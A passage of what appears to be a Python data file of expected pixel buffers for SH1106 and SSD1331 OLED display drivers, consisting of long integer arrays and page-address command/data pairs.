128, 128, 128, 128, 128, 128, 129, 142, 176, 128, 184, 167, 160, 160, 160,
160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 167,
184, 128, 191, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160,
160, 160, 160, 160, 160, 160, 160, 191, 128, 128, 128, 128, 128, 128, 131,
140, 136, 144, 144, 176, 144, 144, 136, 140, 131, 128, 128, 128, 128, 128,
128, 255
]
demo_sh1106 = [
{'command': [176, 2, 16]}, {'data': [255, 1, 1, 1, 1, 1, 129, 97, 25, 9, 5, 5, 5, 5, 5, 9, 25, 97, 129, 1, 1, 1, 1, 1, 253, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 253, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 225, 29, 225, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 13, 113, 129, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 129, 113, 13, 1, 225, 225, 129, 225, 225, 33, 129, 193, 65, 193, 129, 1, 17, 17, 241, 241, 1, 1, 17, 17, 241, 241, 1, 1, 129, 193, 65, 193, 129, 1, 1, 1, 1, 1, 1, 1, 1, 255]},
{'command': [177, 2, 16]}, {'data': [255, 0, 0, 0, 240, 14, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 14, 240, 0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 7, 0, 7, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 28, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 224, 28, 3, 0, 0, 0, 7, 7, 0, 7, 7, 4, 3, 7, 5, 5, 5, 0, 4, 4, 7, 7, 4, 4, 4, 4, 7, 7, 4, 4, 3, 7, 4, 7, 3, 0, 0, 0, 0, 0, 0, 0, 0, 255]},
{'command': [178, 2, 16]}, {'data': [255, 0, 192, 63, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 63, 192, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 128, 126, 1, 0, 0, 0, 1, 126, 128, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 56, 192, 0, 0, 0, 0, 0, 192, 56, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255]},
{'command': [179, 2, 16]}, {'data': [255, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 224, 31, 0, 0, 0, 0, 0, 0, 0, 31, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 14, 112, 128, 112, 14, 1, 0, 0, 0, 0, 0, 0, 0, 0, 30, 112, 62, 112, 30, 2, 56, 124, 68, 124, 56, 0, 68, 124, 120, 76, 4, 12, 65, 65, 127, 127, 64, 64, 56, 124, 69, 127, 127, 64, 0, 94, 94, 0, 0, 0, 0, 255]},
{'command': [180, 2, 16]}, {'data': [255, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 0, 0, 0, 0, 0, 248, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 128, 112, 14, 1, 14, 112, 128, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255]},
{'command': [181, 2, 16]}, {'data': [255, 0, 1, 126, 128, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 128, 126, 1, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 0, 0, 0, 128, 126, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 126, 128, 0, 0, 0, 0, 0, 0, 0, 0, 224, 28, 3, 0, 0, 0, 0, 0, 3, 28, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255]},
{'command': [182, 2, 16]}, {'data': [255, 0, 0, 0, 7, 56, 192, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 192, 56, 7, 0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 0, 0, 224, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 224, 0, 0, 0, 0, 192, 56, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 56, 192, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255]},
{'command': [183, 2, 16]}, {'data': [255, 128, 128, 128, 128, 128, 128, 131, 140, 136, 144, 144, 176, 144, 144, 136, 140, 131, 128, 128, 128, 128, 128, 128, 191, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 191, 128, 184, 167, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 167, 184, 128, 176, 142, 129, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 129, 142, 176, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 255]}
]
demo_ssd1331 = [
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 255, 255, 255, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 248, 0, 248, 0, 248, 0, 248, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 31, 0, 31, 0,
31, 0, 31, 0, 31, 0, 31, 0, 31, 0, 31, 0, 31, 0, 31, 0, 31, 0, 31, 0, 31,
0, 31, 0, 31, 0, 31, 0, 31, 0, 31, 0, 31, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 255, 255, 255,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 248, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 248, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 255, 255, 255,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 255, 255, 255, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 224, 0, 0, 0, 0, 7, 255, 7, 255, 0, 0, 7, 255, 7, 255, 7, 255, 255,
255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 255, 224, 0, 0, 0, 0, 7, 255, 7, 255, 0, 0, 7, 255, 7, 255, 255, 255,
255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 255, 224, 0, 0, 0, 0, 0, 0, 7, 255, 7, 255, 7, 255, 7, 255, 7, 255, 255,
255, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 4, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 7, 255, 7, 255, 0, 0, 7, 255, 7, 255,
255, 255, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 4, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 7, 255, 7, 255, 0, 0, 7, 255, 7,
255, 255, 255, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 4, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 7, 255, 7, 255, 0, 0, 7, 255,
7, 255, 7, 255, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 4,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 255, 255, 255, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0,
0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 255, 255, 255, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0,
0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0,
